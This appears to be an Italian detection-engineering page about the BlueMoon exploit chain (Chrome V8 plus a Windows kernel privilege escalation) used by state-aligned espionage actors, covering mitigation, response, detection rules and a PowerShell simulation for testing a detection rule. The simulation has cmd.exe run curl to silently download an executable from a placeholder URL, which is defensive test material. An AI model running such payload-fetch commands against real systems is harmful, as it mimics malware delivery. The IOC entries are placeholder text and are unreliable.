Le vulnerabilità zero-day di Chrome e Windows alimentano la rapida adozione da parte di attori di minacce allineati agli stati
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Molti attori di minacce focalizzati sull’esionaggio hanno adottato il kit di exploit BlueMoon, che combina le vulnerabilità di Chrome V8 con una zero-day di LPE del kernel di Windows. La campagna mostra una rapida adozione operativa e potrebbe coinvolgere lo sviluppo di exploit assistito dall’IA. Diversi attori, principalmente sospettati di essere collegati alla Cina, utilizzano il kit per distribuire vari payload, inclusi estensioni per browser dannose e backdoor.
Indagine
Proofpoint ha identificato quattro diversi cluster di minacce che utilizzano il kit BlueMoon, osservando tecniche di orchestrazione e caricamento simili nonostante le differenze nel packaging. L’indagine ha evidenziato lo sfruttamento delle vulnerabilità di gap di patch e comportamenti post-sfruttamento come il sideloading di DLL e l’installazione di estensioni del browser dannose. L’analisi tecnica ha anche rivelato un ampio logging diagnostico e file di trasferimento markdown che potrebbero indicare uno sviluppo assistito dall’IA.
Mitigazione
Gli utenti dovrebbero assicurarsi che Chrome e altri browser basati su Chromium siano aggiornati all’ultima versione stabile per risolvere le vulnerabilità di V8. Le organizzazioni dovrebbero anche dare priorità al patching di Windows per ridurre l’esposizione alla falla di LPE del kernel. Si raccomanda di monitorare alberi di processi sospetti, compresi chrome.exe che avvia cmd.exe or curl.exe, e di controllare le attività programmate per nomi insoliti.
Risposta
Se viene rilevato lo sfruttamento di BlueMoon, gli endpoint interessati devono essere isolati immediatamente per prevenire ulteriori movimenti laterali o esfiltrazioni di dati. Gli analisti dovrebbero eseguire la forensica della memoria per identificare le DLL caricate in modo riflessivo e ispezionare i sistemi per verificare la presenza di estensioni del browser non autorizzate. I team di sicurezza dovrebbero anche cercare meccanismi di persistenza, in particolare attività programmate sospette e modifiche al registro nell’alveare CLSID.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Uso Sospetto di CURL (via cmdline)
File Sospetti nel Profilo Utente Pubblico (via file_event)
Possibile Abuso di Domain di Sviluppo Cloudflare (via dns)
Tentativo di Comunicazioni con Domain di IP Lookup (via dns)
Controllo e Comando Sospetto su Richiesta DNS di Dominio di Primo Livello (TLD) Insolito (via dns)
IOCs (HashSha256) da rilevare: Una volta in un BlueMoon: Molteplici attori di minacce allineati a stati adottano rapidamente una nuova catena di exploit utilizzando Chrome e Windows zero-days
IOCs (SourceIP) da rilevare: Una volta in un BlueMoon: Molteplici attori di minacce allineati a stati adottano rapidamente una nuova catena di exploit utilizzando Chrome e Windows zero-days
IOCs (DestinationIP) da rilevare: Una volta in un BlueMoon: Molteplici attori di minacce allineati a stati adottano rapidamente una nuova catena di exploit utilizzando Chrome e Windows zero-days
Rilevamento della Catena di Exploit BlueMoon tramite Esecuzione di Chrome a CMD e CURL [Creazione Processo di Windows]
Esecuzione della Simulazione
-
Narrazione dell’Attacco & Comandi: L’avversario prende di mira un utente che naviga sul web. Sfruttando una vulnerabilità in Chrome, l’attaccante costringe il browser a generare una shell dei comandi. Per ridurre al minimo le tracce e evitare di scaricare grandi file direttamente tramite il browser, l’attaccante utilizza
cmd.exeper invocarecurl. Il comando utilizza specificamente i flag-sS -oper scaricare silenziosamente un payload chiamatomsgbox.exeda un server remoto, simulando il comportamento dell’exploit BlueMoon. -
Script di Test di Regressione:
# Simulazione della Catena di Exploit BlueMoon # Passo 1: Simulare Chrome come processo padre (utilizzeremo un wrapper PowerShell per simulare l'albero di PID/Processi se necessario, # ma per un test diretto, attiviamo il pattern della riga di comando). $SimulatedPayloadUrl = "https://raw.githubusercontent.com/example/payload/main/msgbox.exe" $TargetDir = "$env:TEMPmsgbox.exe" Write-Host "[!] Inizio Simulazione BlueMoon..." # Per garantire che il rilevamento si attivi, dobbiamo imitare esattamente la riga di comando definita nella regola Sigma. # Nota: In un ambiente reale, chrome.exe sarebbe il genitore. # Per questo script, eseguiamo il comando che la regola sta cercando. Start-Process "cmd.exe" -ArgumentList "/c curl -sS -o $TargetDir $SimulatedPayloadUrl" -Wait Write-Host "[+] Simulazione completata. Controlla il SIEM per il rilevamento." -
Comandi di Pulizia:
# Rimuovere il payload simulato Remove-Item -Path "$env:TEMPmsgbox.exe" -ErrorAction SilentlyContinue Write-Host "[+] Pulizia completata."